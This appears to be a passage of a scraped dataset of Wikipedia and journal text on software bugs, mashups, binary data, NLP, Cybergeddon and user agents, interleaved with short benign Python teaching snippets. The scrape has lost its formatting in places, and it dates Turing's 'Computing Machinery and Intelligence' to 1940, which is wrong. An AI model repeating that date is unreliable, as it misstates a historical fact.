surprise to find where most of the time is taken by a piece of code, and this removal of assumptions might cause the code to be rewritten. Open source development allows anyone to examine source code. A school of thought popularized by Eric S. Raymond as Linus's law says that popular open-source software has more chance of having few or no bugs than other software, because "given enough eyeballs, all bugs are shallow". 12 
This assertion has been disputed, however: computer security specialist Elias Levy wrote that "it is easy to hide vulnerabilities in complex, little understood and undocumented source code" because "even if people are reviewing the code, that doesn't mean they're qualified to do so." 13 An example of an open-source software bug was the 2008 OpenSSL vulnerability in Debian. Debugging can be a significant part of the software development lifecycle. Maurice Wilkes, an early computing pioneer, described his realization in the late 1940s that "a good part of the remainder of my life was going to be spent in finding errors in my own programs". 14 A program known as a debugger can help a programmer find faulty code by examining the inner workings of a program, such as executing code line-by-line and viewing variable values. As an alternative to using a debugger, code may be instrumented with logic to output debug information to trace program execution and view values. Output is typically to a console, window, log file or a hardware output (e.g. an LED). Some contend that locating a bug is something of an art. It is not uncommon for a bug in one section of a program to cause failures in a different, apparently unrelated part of the system, making it difficult to track down; for example, an error in a graphics rendering routine may cause a file I/O routine to fail. Sometimes, the most difficult part of debugging is finding the cause of the bug. Once found, correcting the problem is sometimes easy if not trivial. Sometimes, a bug is not an isolated flaw, but represents an error of thinking or planning on the part of the programmers. Often, such a logic error requires a section of the program to be overhauled or rewritten. Some contend that as a part of code review, stepping through the code and imagining or transcribing the execution process may often find errors without ever reproducing the bug as such. Typically, the first step in locating a bug is to reproduce it reliably. If unable to reproduce the issue, a programmer cannot find the cause of the bug and therefore cannot fix it. Some bugs are revealed by inputs that may be difficult for the programmer to re-create. One cause of the Therac-25 radiation machine deaths was a bug (specifically, a race condition) that occurred only when the machine operator very rapidly entered a treatment plan; it took days of practice to become able to do this, so the bug did not manifest in testing or when the manufacturer attempted to duplicate it. Other bugs may stop occurring whenever the setup is augmented to help find the bug, such as running the program with a debugger; these are called heisenbugs (humorously named after the Heisenberg uncertainty principle). Since the 1990s, particularly following the Ariane 5 Flight 501 disaster, interest in automated aids to debugging has risen, such as static code analysis by abstract interpretation. 15 Often, bugs come about during coding, but faulty design documentation may also cause a bug. In some cases, changes to the code may eliminate the problem even though the code then no longer matches the documentation. In an embedded system, the software is often modified to work around a hardware bug, since this is cheaper than modifying the hardware. Bugs are managed via activities like documenting, categorizing, assigning, reproducing, correcting and releasing the corrected code. Tools are often used to track bugs and other issues with software. 
Typically, different tools are used by the software development team to track their workload than by customer service to track user feedback. 16 A tracked item is often called bug, defect, ticket, issue, feature, or for agile software development, story or epic. Items are often categorized by aspects such as severity, priority and version number. In a process sometimes called triage, choices are made for each bug about whether and when to fix it based on information such as the bug's severity and priority and external factors such as development schedules. Triage generally does not include investigation into cause. Triage may occur regularly. Triage generally consists of reviewing new bugs since the previous triage and maybe all open bugs. Attendees may include project manager, development manager, test manager, build manager, and technical experts. 17 18 Severity is a measure of impact the bug has. 19 This impact may be data loss, financial, loss of goodwill and wasted effort. Severity levels are not standardized, but differ by context such as industry and tracking tool. For example, a crash in a video game has a different impact than a crash in a bank server. Severity levels might be crash or hang, no workaround (user cannot accomplish a task), has workaround (user can still accomplish the task), visual defect (a misspelling for example), or documentation error. Another example set of severities: critical, high, low, blocker, trivial. 20 The severity of a bug may be a separate category to its priority for fixing, or the two may be quantified and managed separately. A bug severe enough to delay the release of the product is called a show stopper. 21 22 Priority describes the importance of resolving the bug in relation to other bugs. Priorities might be numerical, such as 1 through 5, or named, such as critical, high, low, and deferred. The values might be similar or identical to severity ratings, even though priority is a different aspect. Priority may be a combination of the bug's severity with the level of effort to fix. A bug with low severity but easy to fix may get a higher priority than a bug with moderate severity that requires significantly more effort to fix. Bugs of sufficiently high priority may warrant a special release which is sometimes called a patch. A software release that emphasizes bug fixes may be called a maintenance release to differentiate it from a release that emphasizes new features or other changes. It is common practice to release software with known, low-priority bugs or other issues. Possible reasons include but are not limited to: The amount and type of damage a software bug may cause affects decision-making, processes and policy regarding software quality. In applications such as human spaceflight, aviation, nuclear power, health care, public transport or automotive safety, since software flaws have the potential to cause human injury or even death, such software will have far more scrutiny and quality control than, for example, an online shopping website. In applications such as banking, where software flaws have the potential to cause serious financial damage to a bank or its customers, quality control is also more important than, say, a photo editing application. Other than the damage caused by bugs, some of their cost is due to the effort invested in fixing them. In 1978, Lientz et al. showed that the median of projects invest 17 percent of the development effort in bug fixing. 25 In 2020, research on GitHub repositories showed the median is 20%. 
26 In 1994, NASA's Goddard Space Flight Center managed to reduce their average number of errors from 4.5 per 1000 lines of code (SLOC) down to 1 per 1000 SLOC. 27 Another study in 1990 reported that exceptionally good software development processes can achieve deployment failure rates as low as 0.1 per 1000 SLOC. 28 This figure is iterated in literature such as Code Complete by Steve McConnell, 29 and the NASA study on Flight Software Complexity. 30 Some projects even attained zero defects: the firmware in the IBM Wheelwriter typewriter which consists of 63,000 SLOC, and the Space Shuttle software with 500,000 SLOC. 28 To facilitate reproducible research on testing and debugging, researchers use curated benchmarks of bugs: Some notable types of bugs: A bug can be caused by insufficient or incorrect design based on the specification. For example, given that the specification is to alphabetize a list of words, a design bug might occur if the design does not account for symbols; resulting in incorrect alphabetization of words with symbols. Numerical operations can result in unexpected output, slow processing, or crashing. 33 Such a bug can be from a lack of awareness of the qualities of the data storage such as a loss of precision due to rounding, numerically unstable algorithms, arithmetic overflow and underflow, or from lack of awareness of how calculations are handled by different software coding languages such as division by zero which in some languages may throw an exception, and in others may return a special value such as NaN or infinity. A control flow bug, a.k.a. logic error, is characterized by code that does not fail with an error, but does not have the expected behavior, such as infinite looping, infinite recursion, incorrect comparison in a conditional such as using the wrong comparison operator, and the off-by-one error. The Open Technology Institute, run by the group, New America, 38 released a report "Bugs in the System" in August 2016 stating that U.S. policymakers should make reforms to help researchers identify and address software bugs. The report "highlights the need for reform in the field of software vulnerability discovery and disclosure. 39 One of the report's authors said that Congress has not done enough to address cyber software vulnerability, even though Congress has passed a number of bills to combat the larger issue of cyber security. 39 Government researchers, companies, and cyber security experts are the people who typically discover software flaws. The report calls for reforming computer crime and copyright laws. 39 The Computer Fraud and Abuse Act, the Digital Millennium Copyright Act and the Electronic Communications Privacy Act criminalize and create civil penalties for actions that security researchers routinely engage in while conducting legitimate security research, the report said. 39 |
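The scraped article above makes a few concrete technical points: an interpreted language surfaces type errors only at runtime, a minor typo can silently change control flow, and unit tests written alongside production code (as in TDD) are one way to expose such defects. As a minimal illustrative sketch in Python (the language used elsewhere in this notebook, and not taken from the article itself), the snippet below shows an off-by-one logic error of the kind described and a unit test that catches it; the function and test names are invented for the example.

# Illustrative sketch (not from the scraped article): an off-by-one logic
# error, the kind of control-flow bug described above, plus a unit test in
# the spirit of test-driven development that exposes it.
import unittest

def sum_first_n(values, n):
    # Intended to return the sum of the first n items of values.
    # Bug: range(n - 1) stops one element early; the code runs without
    # crashing, so the defect is easy to miss without a test.
    total = 0
    for i in range(n - 1):  # should be range(n)
        total += values[i]
    return total

class TestSumFirstN(unittest.TestCase):
    def test_sums_exactly_n_items(self):
        # Fails with the buggy implementation: 1 + 2 == 3, not 6.
        self.assertEqual(sum_first_n([1, 2, 3, 4], 3), 6)

if __name__ == "__main__":
    unittest.main()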
349 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Text_of_the_Creative_Commons_Attribution-ShareAlike_4.0_International_License | You are free: for any purpose, even commercially. The licensor cannot revoke these freedoms as long as you follow the license terms. Under the following terms: Notices: By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-ShareAlike 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions. Your exercise of the Licensed Rights is expressly made subject to the following conditions. Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the "Licensor. The text of the Creative Commons public licenses is dedicated to the public domain under the CC0 Public Domain Dedication. Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at creativecommons.org policies, Creative Commons does not authorize the use of the trademark "Creative Commons" or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. |
350 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:All_articles_with_unsourced_statements | This is a category to help keep count of the total number of articles with the citation needed template. They should all be in one of the dated categories, which can be found at Category:Articles with unsourced statements. With 524,048 articles in this category, it can be hard to choose which one to work on. The Citation Hunt tool makes the task easier by suggesting random articles, which can be sorted by topic-category membership. |
351 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_mashup | A mashup (computer industry jargon), in web development, is a web page or web application that uses content from more than one source to create a single new service displayed in a single graphical interface. For example, a user could combine the addresses and photographs of their library branches with a Google map to create a map mashup. 1 The term implies easy, fast integration, frequently using open application programming interfaces (open API) and data sources to produce enriched results that were not necessarily the original reason for producing the raw source data. The term mashup originally comes from creating something by combining elements from two or more sources. 2 The main characteristics of a mashup are combination, visualization, and aggregation. It is important to make existing data more useful, for personal and professional use. To be able to permanently access the data of other services, mashups are generally client applications or hosted online. In the past years when? , more and more Web applications have published APIs that enable software developers to easily integrate data and functions the SOA way, instead of building them by themselves. Mashups can be considered to have an active role in the evolution of social software and Web 2.0. Mashup composition tools are usually simple enough to be used by end-users. They generally do not require programming skills and rather support visual wiring of GUI widgets, services and components together. Therefore, these tools contribute to a new vision of the Web, where users are able to contribute. clarification needed The term "mashup" is not formally defined by any standard-setting body. 3 The broader context of the history of the Web provides a background for the development of mashups. Under the Web 1.0 model, organizations stored consumer data on portals and updated them regularly. They controlled all the consumer data, and the consumer had to use their products and services to get the information. citation needed The advent of Web 2.0 introduced Web standards that were commonly and widely adopted across traditional competitors and which unlocked the consumer data. At the same time, mashups emerged, allowing mixing and matching competitors' APIs to develop new services. The first mashups used mapping services or photo services to combine these services with data of any kind and therefore to produce visualizations of data. 4 failed verification In the beginning, most mashups were consumer-based, but recently when? the mashup is to be seen by whom? as an interesting concept useful also to enterprises. Business mashups can combine existing internal data with external services to generate new views on the data. There was also the free Yahoo Pipes to build mashups for free using the Yahoo Query Language. There are many types of mashup, such as business mashups, consumer mashups, and data mashups. 5 The most common type of mashup is the consumer mashup, aimed at the general public. Mashups can also be categorized by the basic API type they use but any of these can be combined with each other or embedded into other applications. In technology, a mashup enabler is a tool for transforming incompatible IT resources into a form that allows them to be easily combined, in order to create a mashup. Mashup enablers allow powerful techniques and tools (such as mashup platforms) for combining data and services to be applied to new kinds of resources. 
An example of a mashup enabler is a tool for creating an RSS feed from a spreadsheet (which cannot easily be used to create a mashup). Many mashup editors include mashup enablers, for example, Presto Mashup Connectors, Convertigo Web Integrator or Caspio Bridge. Mashup enablers have also been described as "the service and tool providers, sic that make mashups possible". citation needed Early mashups were developed manually by enthusiastic programmers. However, as mashups became more popular, companies began creating platforms for building mashups, which allow designers to visually construct mashups by connecting together mashup components. Mashup editors have greatly simplified the creation of mashups, significantly increasing the productivity of mashup developers and even opening mashup development to end-users and non-IT experts. Standard components and connectors enable designers to combine mashup resources in all sorts of complex ways with ease. Mashup platforms, however, have done little to broaden the scope of resources accessible by mashups and have not freed mashups from their reliance on well-structured data and open libraries (RSS feeds and public APIs). Mashup enablers evolved to address this problem, providing the ability to convert other kinds of data and services into mashable resources. Of course, not all valuable data is located within organizations. In fact, the most valuable information for business intelligence and decision support is often external to the organization. With the emergence of rich web applications and online Web portals, a wide range of business-critical processes (such as ordering) are becoming available online. Unfortunately, very few of these data sources syndicate content in RSS format and very few of these services provide publicly accessible APIs. Mashup editors therefore solve this problem by providing enablers or connectors. Mashups and portals are both content aggregation technologies. Portals are an older technology designed as an extension to traditional dynamic Web applications, in which the process of converting data content into marked-up Web pages is split into two phases: generation of markup "fragments" and aggregation of the fragments into pages. Each markup fragment is generated by a "portlet", and the portal combines them into a single Web page. Portlets may be hosted locally on the portal server or remotely on a separate server. Portal technology defines a complete event model covering reads and updates. A request for an aggregate page on a portal is translated into individual read operations on all the portlets that form the page ("render" operations on local, JSR 168 portlets or "getMarkup" operations on remote, WSRP portlets). If a submit button is pressed on any portlet on a portal page, it is translated into an update operation on that portlet alone (processAction on a local portlet or performBlockingInteraction on a remote, WSRP portlet). The update is then immediately followed by a read on all portlets on the page. Portal technology is about server-side, presentation-tier aggregation. It cannot be used to drive more robust forms of application integration such as two-phase commit. Mashups differ from portals in the following respects: The portal model has been around longer and has had greater investment and product research. Portal technology is therefore more standardized and mature. 
Over time, increasing maturity and standardization of mashup technology will likely make it more popular than portal technology because it is more closely associated with Web 2.0 and lately Service-oriented Architectures (SOA). 7 New versions of portal products are expected to eventually add mashup support while still supporting legacy portlet applications. Mashup technologies, in contrast, are not expected to provide support for portal standards. Mashup uses are expanding in the business environment. Business mashups are useful for integrating business and data services, as business mashups technologies provide the ability to develop new integrated services quickly, to combine internal services with external or personalized information, and to make these services tangible to the business user through user-friendly Web browser interfaces. 8 Business mashups differ from consumer mashups in the level of integration with business computing environments, security and access control features, governance, and the sophistication of the programming tools (mashup editors) used. Another difference between business mashups and consumer mashups is a growing trend of using business mashups in commercial software as a service (SaaS) offering. Many of the providers of business mashups technologies have added SOA features. The architecture of a mashup is divided into three layers: Architecturally, there are two styles of mashups: Web-based and server-based. Whereas Web-based mashups typically use the user's web browser to combine and reformat the data, server-based mashups analyze and reformat the data on a remote server and transmit the data to the user's browser in its final form. 9 Mashups appear to be a variation of a fa ade pattern. 10 That is: a software engineering design pattern that provides a simplified interface to a larger body of code (in this case the code to aggregate the different feeds with different APIs). Mashups can be used with software provided as a service (SaaS). After several years of standards development, mainstream businesses are starting to adopt service-oriented architectures (SOA) to integrate disparate data by making them available as discrete Web services. Web services provide open, standardized protocols to provide a unified means of accessing information from a diverse set of platforms (operating systems, programming languages, applications). These Web services can be reused to provide completely new services and applications within and across organizations, providing business flexibility. |
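The mashup article above gives one concrete example of a mashup enabler: a tool that turns a spreadsheet into an RSS feed so it can be consumed by mashup platforms. A hedged Python sketch of that idea follows; the CSV file name and its title/url columns are assumptions made for the example, not something taken from the scraped article.

# Hypothetical mashup-enabler sketch: convert spreadsheet-style data (CSV)
# into a minimal RSS 2.0 feed. Column names "title" and "url" are assumed.
import csv
import xml.etree.ElementTree as ET

def csv_to_rss(csv_path, feed_title, feed_link):
    rss = ET.Element("rss", version="2.0")
    channel = ET.SubElement(rss, "channel")
    ET.SubElement(channel, "title").text = feed_title
    ET.SubElement(channel, "link").text = feed_link
    with open(csv_path, newline="", encoding="utf-8") as f:
        for row in csv.DictReader(f):
            item = ET.SubElement(channel, "item")
            ET.SubElement(item, "title").text = row["title"]
            ET.SubElement(item, "link").text = row["url"]
    return ET.tostring(rss, encoding="unicode")

# Example usage (hypothetical file):
# print(csv_to_rss("library_branches.csv", "Library branches", "https://example.org"))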
352 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Binary_data | Binary data is data whose unit can take on only two possible states. These are often labelled as 0 and 1 in accordance with the binary numeral system and Boolean algebra. Binary data occurs in many different technical and scientific fields, where it can be called by different names including bit (binary digit) in computer science, truth value in mathematical logic and related domains and binary variable in statistics. A discrete variable that can take only one state contains zero information, and 2 is the next natural number after 1. That is why the bit, a variable with only two possible values, is a standard primary unit of information. A collection of n bits may have 2n states: see binary number for details. Number of states of a collection of discrete variables depends exponentially on the number of variables, and only as a power law on number of states of each variable. Ten bits have more (1024) states than three decimal digits (1000). 10k bits are more than sufficient to represent an information (a number or anything else) that requires 3k decimal digits, so information contained in discrete variables with 3, 4, 5, 6, 7, 8, 9, 10... states can be ever superseded by allocating two, three, or four times more bits. So, the use of any other small number than 2 does not provide an advantage. Moreover, Boolean algebra provides a convenient mathematical structure for collection of bits, with a semantic of a collection of propositional variables. Boolean algebra operations are known as "bitwise operations" in computer science. Boolean functions are also well-studied theoretically and easily implementable, either with computer programs or by so-named logic gates in digital electronics. This contributes to the use of bits to represent different data, even those originally not binary. In statistics, binary data is a statistical data type consisting of categorical data that can take exactly two possible values, such as "A" and "B", or "heads" and "tails". It is also called dichotomous data, and an older term is quantal data. 1 The two values are often referred to generically as "success" and "failure". 1 As a form of categorical data, binary data is nominal data, meaning the values are qualitatively different and cannot be compared numerically. However, the values are frequently represented as 1 or 0, which corresponds to counting the number of successes in a single trial: 1 (success…) or 0 (failure); see Counting. Often, binary data is used to represent one of two conceptually opposed values, e.g.: However, it can also be used for data that is assumed to have only two possible values, even if they are not conceptually opposed or conceptually represent all possible values in the space. For example, binary data is often used to represent the party choices of voters in elections in the United States, i.e. Republican or Democratic. In this case, there is no inherent reason why only two political parties should exist, and indeed, other parties do exist in the U.S., but they are so minor that they are generally simply ignored. Modeling continuous data (or categorical data of more than 2 categories) as a binary variable for analysis purposes is called dichotomization (creating a dichotomy). 
Like all discretization, it involves discretization error, but the goal is to learn something valuable despite the error: treating it as negligible for the purpose at hand, but remembering that it cannot be assumed to be negligible in general. A binary variable is a random variable of binary type, meaning with two possible values. Independent and identically distributed (i.i.d.) binary variables follow a Bernoulli distribution, but in general binary data need not come from i.i.d. variables. Total counts of i.i.d. binary variables (equivalently, sums of i.i.d. binary variables coded as 1 or 0) follow a binomial distribution, but when binary variables are not i.i.d., the distribution need not be binomial. Like categorical data, binary data can be converted to a vector of count data by writing one coordinate for each possible value, and counting 1 for the value that occurs, and 0 for the value that does not occur. 2 For example, if the values are A and B, then the data set A, A, B can be represented in counts as (1, 0), (1, 0), (0, 1). Once converted to counts, binary data can be grouped and the counts added. For instance, if the set A, A, B is grouped, the total counts are (2, 1): 2 A's and 1 B (out of 3 trials). Since there are only two possible values, this can be simplified to a single count (a scalar value) by considering one value as "success" and the other as "failure", coding a value of the success as 1 and of the failure as 0 (using only the coordinate for the "success" value, not the coordinate for the "failure" value). For example, if the value A is considered "success" (and thus B is considered "failure"), the data set A, A, B would be represented as 1, 1, 0. When this is grouped, the values are added, while the number of trial is generally tracked implicitly. For example, A, A, B would be grouped as 1 1 0 2 successes (out of n 3 displaystyle n 3 trials). Going the other way, count data with n 1 displaystyle n 1 is binary data, with the two classes being 0 (failure) or 1 (success). Counts of i.i.d. binary variables follow a binomial distribution, with n displaystyle n the total number of trials (points in the grouped data). Regression analysis on predicted outcomes that are binary variables is known as binary regression; when binary data is converted to count data and modeled as i.i.d. variables (so they have a binomial distribution), binomial regression can be used. The most common regression methods for binary data are logistic regression, probit regression, or related types of binary choice models. Similarly, counts of i.i.d. categorical variables with more than two categories can be modeled with a multinomial regression. Counts of non-i.i.d. binary data can be modeled by more complicated distributions, such as the beta-binomial distribution (a compound distribution). Alternatively, the relationship can be modeled without needing to explicitly model the distribution of the output variable using techniques from generalized linear models, such as quasi-likelihood and a quasibinomial model; see Overdispersion Binomial. In modern computers, binary data refers to any data represented in binary form rather than interpreted on a higher level or converted into some other form. At the lowest level, bits are stored in a bistable device such as a flip-flop. While most binary data has symbolic meaning (except for don't cares) not all binary data is numeric. 
Some binary data corresponds to computer instructions, such as the data within processor registers decoded by the control unit along the fetch-decode-execute cycle. Computers rarely modify individual bits for performance reasons. Instead, data is aligned in groups of a fixed number of bits, usually 1 byte (8 bits). Hence, "binary data" in computers are actually sequences of bytes. On a higher level, data is accessed in groups of 1 word (4 bytes) for 32 bit systems and 2 words for 64 bit systems. In applied computer science and in the information technology field, the term binary data is often specifically opposed to text-based data, referring to any sort of data that cannot be interpreted as text. The "text" vs. "binary" distinction can sometimes refer to the semantic content of a file (e.g. a written document vs. a digital image). However, it often refers specifically to whether the individual bytes of a file are interpretable as text (see character encoding) or cannot so be interpreted. When this last meaning is intended, the more specific terms binary format and text(ual) format are sometimes used. Semantically textual data can be represented in binary format (e.g. when compressed or in certain formats that intermix various sorts of formatting codes, as in the doc format used by Microsoft Word); contrarily, image data is sometimes represented in textual format (e.g. the X PixMap image format used in the X Window System). 1 and 0 are nothing but just two different voltage levels. You can make the computer understand 1 for higher voltage and 0 for lower voltage. There are many different ways to store two voltage levels. If you have seen floppy, then you will find a magnetic tape that has a coating of ferromagnetic material, this is a type of paramagnetic material that has domains aligned in a particular direction to give a remnant magnetic field even after removal of currents through materials or magnetic field. During loading of data in the magnetic tape, the magnetic field is passed in one direction to call the saved orientation of the domain 1 and for the magnetic field is passed in another direction, then the saved orientation of the domain is 0. In this way, generally, 1 and 0 data are stored. 3 |
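The counting scheme described in the binary-data article (A, A, B becoming per-value counts, grouped counts, and a single success/failure coding) can be reproduced in a few lines of Python; the snippet below is simply a worked restatement of the article's own example.

# Worked example of the coding described above: the data set A, A, B as
# per-observation counts, grouped counts, and a success/failure coding with
# "A" treated as success.
from collections import Counter

data = ["A", "A", "B"]

# Per-observation counts: A -> (1, 0), B -> (0, 1)
per_observation = [(1, 0) if x == "A" else (0, 1) for x in data]
print(per_observation)               # [(1, 0), (1, 0), (0, 1)]

# Grouped counts: 2 A's and 1 B out of 3 trials
grouped = Counter(data)
print(grouped["A"], grouped["B"])    # 2 1

# Scalar success/failure coding, with A as "success"
coded = [1 if x == "A" else 0 for x in data]
print(sum(coded), "successes out of", len(coded), "trials")  # 2 successes out of 3 trials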
353 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Natural_language_processing | Natural language processing (NLP) is an interdisciplinary subfield of computer science and artificial intelligence. It is primarily concerned with providing computers with the ability to process data encoded in natural language and is thus closely related to information retrieval, knowledge representation and computational linguistics, a subfield of linguistics. Typically data is collected in text corpora, using either rule-based, statistical or neural-based approaches in machine learning and deep learning. Major tasks in natural language processing are speech recognition, text classification, natural-language understanding, and natural-language generation. Natural language processing has its roots in the 1940s. 1 Already in 1940, Alan Turing published an article titled "Computing Machinery and Intelligence" which proposed what is now called the Turing test as a criterion of intelligence, though at the time that was not articulated as a problem separate from artificial intelligence. The proposed test includes a task that involves the automated interpretation and generation of natural language. The premise of symbolic NLP is well-summarized by John Searle's Chinese room experiment: Given a collection of rules (e.g., a Chinese phrasebook, with questions and matching answers), the computer emulates natural language understanding (or other NLP tasks) by applying those rules to the data it confronts. Up until the 1980s, most natural language processing systems were based on complex sets of hand-written rules. Starting in the late 1980s, however, there was a revolution in natural language processing with the introduction of machine learning algorithms for language processing. This was due to both the steady increase in computational power (see Moore's law) and the gradual lessening of the dominance of Chomskyan theories of linguistics (e.g. transformational grammar), whose theoretical underpinnings discouraged the sort of corpus linguistics that underlies the machine-learning approach to language processing. 8 In 2003, word n-gram model, at the time the best statistical algorithm, was outperformed by a multi-layer perceptron (with a single hidden layer and context length of several words trained on up to 14 million of words with a CPU cluster in language modelling) by Yoshua Bengio with co-authors. 9 In 2010, Tom Mikolov (then a PhD student at Brno University of Technology) with co-authors applied a simple recurrent neural network with a single hidden layer to language modelling, 10 and in the following years he went on to develop Word2vec. In the 2010s, representation learning and deep neural network-style (featuring many hidden layers) machine learning methods became widespread in natural language processing. That popularity was due partly to a flurry of results showing that such techniques 11 12 can achieve state-of-the-art results in many natural language tasks, e.g., in language modeling 13 and parsing. 14 15 This is increasingly important in medicine and healthcare, where NLP helps analyze notes and text in electronic health records that would otherwise be inaccessible for study when seeking to improve care 16 or protect patient privacy. 
17 Symbolic approach, i.e., the hand-coding of a set of rules for manipulating symbols, coupled with a dictionary lookup, was historically the first approach used both by AI in general and by NLP in particular: 18 19 such as by writing grammars or devising heuristic rules for stemming. Machine learning approaches, which include both statistical and neural networks, on the other hand, have many advantages over the symbolic approach: Although rule-based systems for manipulating symbols were still in use in 2020, they have become mostly obsolete with the advance of LLMs in 2023. Before that they were commonly used: In the late 1980s and mid 1990s, the statistical approach ended a period of AI winter, which was caused by the inefficiencies of the rule-based approaches. 20 21 The earliest decision trees, producing systems of hard if then rules, were still very similar to the old rule-based approaches. Only the introduction of hidden Markov models, applied to part-of-speech tagging, announced the end of the old rule-based approach. A major drawback of statistical methods is that they require elaborate feature engineering. Since 2015, 22 the statistical approach has been replaced by the neural networks approach, using semantic networks 23 and word embeddings to capture semantic properties of words. Intermediate tasks (e.g., part-of-speech tagging and dependency parsing) are not needed anymore. Neural machine translation, based on then-newly-invented sequence-to-sequence transformations, made obsolete the intermediate steps, such as word alignment, previously necessary for statistical machine translation. The following is a list of some of the most commonly researched tasks in natural language processing. Some of these tasks have direct real-world applications, while others more commonly serve as subtasks that are used to aid in solving larger tasks. Though natural language processing tasks are closely intertwined, they can be subdivided into categories for convenience. A coarse division is given below. Based on long-standing trends in the field, it is possible to extrapolate future directions of NLP. As of 2020, three trends among the topics of the long-standing series of CoNLL Shared Tasks can be observed: 46 Most higher-level NLP applications involve aspects that emulate intelligent behaviour and apparent comprehension of natural language. More broadly speaking, the technical operationalization of increasingly advanced aspects of cognitive behaviour represents one of the developmental trajectories of NLP (see trends among CoNLL shared tasks above). Cognition refers to "the mental action or process of acquiring knowledge and understanding through thought, experience, and the senses. 47 Cognitive science is the interdisciplinary, scientific study of the mind and its processes. 48 Cognitive linguistics is an interdisciplinary branch of linguistics, combining knowledge and research from both psychology and linguistics. 49 Especially during the age of symbolic NLP, the area of computational linguistics maintained strong ties with cognitive studies. As an example, George Lakoff offers a methodology to build natural language processing (NLP) algorithms through the perspective of cognitive science, along with the findings of cognitive linguistics, 50 with two defining aspects: Ties with cognitive linguistics are part of the historical heritage of NLP, but they have been less frequently addressed since the statistical turn during the 1990s. 
Nevertheless, approaches to develop cognitive models towards technically operationalizable frameworks have been pursued in the context of various frameworks, e.g., of cognitive grammar, 53 functional grammar, 54 construction grammar, 55 computational psycholinguistics and cognitive neuroscience (e.g., ACT-R), however, with limited uptake in mainstream NLP (as measured by presence on major conferences 56 of the ACL). More recently, ideas of cognitive NLP have been revived as an approach to achieve explainability, e.g., under the notion of "cognitive AI". 57 Likewise, ideas of cognitive NLP are inherent to neural models multimodal NLP (although rarely made explicit) 58 and developments in artificial intelligence, specifically tools and technologies using large language model approaches 59 and new directions in artificial general intelligence based on the free energy principle 60 by British neuroscientist and theoretician at University College London Karl J. Friston. |
354 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cybergeddon | Cybergeddon (from tech. cyber-, lit. "computer"; Hebrew: Megiddo, extracted from Har Megiddo, "mountain of final battle") refers to a cataclysm resulting from a large-scale sabotage of all computerized networks, systems and activities. It combines cyberterrorism, cyberwarfare, cybercrime, and hacktivism into scenarios of wide-scale internet disruption or economic collapse. 1 Economic or industrial infrastructure could be targeted, such as banks 2 or industrial control systems. 3 Since 2012, the number of Internet-based attacks and their complexity has increased. 4 "Cybergeddon is a possibility," FireEye CEO Ashar Aziz explained in an interview with Bloomberg: "Attacks on critical infrastructures such as the power grid or financial institutions could wreak havoc not just on the United States economy, but in fact the world economy." 5 The Defense Technical Information Center cited nuclear electromagnetic pulse attacks as a part of the military action that may bring about cybergeddon. 6 |
355 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/User_agent | On the Web, a user agent is a software agent responsible for retrieving and facilitating end-user interaction with Web content. 1 This includes all web browsers, such as Google Chrome and Safari, some email clients, standalone download managers like youtube-dl, and other command-line utilities like cURL. 2 The user agent is the client in a client-server system. The HTTP User-Agent header is intended to clearly identify the agent to the server. 2 However, this header can be omitted or spoofed, 2 so some websites use other detection methods. |
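Since this notebook already uses the requests library, it is worth noting how the User-Agent header described above is set in practice. The sketch below sends a custom header; the URL and the header string are placeholders, and many sites vary their response (or block requests) based on this value.

# Minimal sketch: sending a custom User-Agent header with requests.
# The URL and the User-Agent string below are placeholders for illustration.
import requests

headers = {"User-Agent": "Mozilla/5.0 (compatible; ExampleScraper/1.0)"}
response = requests.get("https://example.com", headers=headers, timeout=10)
print(response.status_code)
print(response.request.headers["User-Agent"])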
356 | https://en.wikipedia.org/wiki/Data_scraping | https://doi.org/10.5334%2Fdsj-2021-024 | The Southern African Science Service Centre for Climate and Land Management (SASSCAL) was initiated to support regional weather monitoring and climate research in Southern Africa. As a result, several Automatic Weather Stations (AWSs) were implemented to provide numerical weather data within the collaborating countries. Meanwhile, access to the SASSCAL weather data is limited to a number of records that are achieved via a series of clicks. Currently, end users can not efficaciously extract the desired weather values. Thus, the data is not fully utilised by end users. This work contributes with an open source Web Scraping Application Programming Interface (WebSAPI) through an interactive dashboard. The objective is to extend functionalities of the SASSCAL Weathernet for: data extraction, statistical data analysis and visualisation. The SASSCAL WebSAPI was developed using the R statistical environment. It deploys web scraping and data wrangling techniques to support access to SASSCAL weather data. This WebSAPI reduces the risk of human error, and the researcher’s effort of generating desired data sets. The proposed framework for the SASSCAL WebSAPI can be modified for other weather data banks while taking into consideration the legality and ethics of the toolkit. Meteorological weather data are useful in filling information needs in academia and industrial settings. The information generated from these data at local levels is useful in complementing: hydrological models (Schuol Abbaspour 2007), high impact weather predictions models (Chang et al. 2013), and simulations of heavy rainfall events (Bopape et al. 2021, Molongwane et al. 2020, Somses et al. 2020) and heatwaves (Moses 2017). Moreover, weather data are also vital for agro-meteorological operations, as well as in efficacious planning of construction and recreational activities. Although there is a huge need of weather or climatological data for Southern Africa, various institutions and enterprises like BIUST, SASSCAL1 and WASCAL2 have introduced AWSs to monitor weather events at finer intervals. However, most of AWSs installed in developing countries are underutilized. For instance, the Botswana Department of Meteorological Services (BDMS)’s mandate is to provide quality weather, climate information and services to enable informed decision making for sustainable socio-economic development in scenarios related to weather and climate. Meanwhile, the BDMS lacks a designated online platform (currently relies on radio stations, 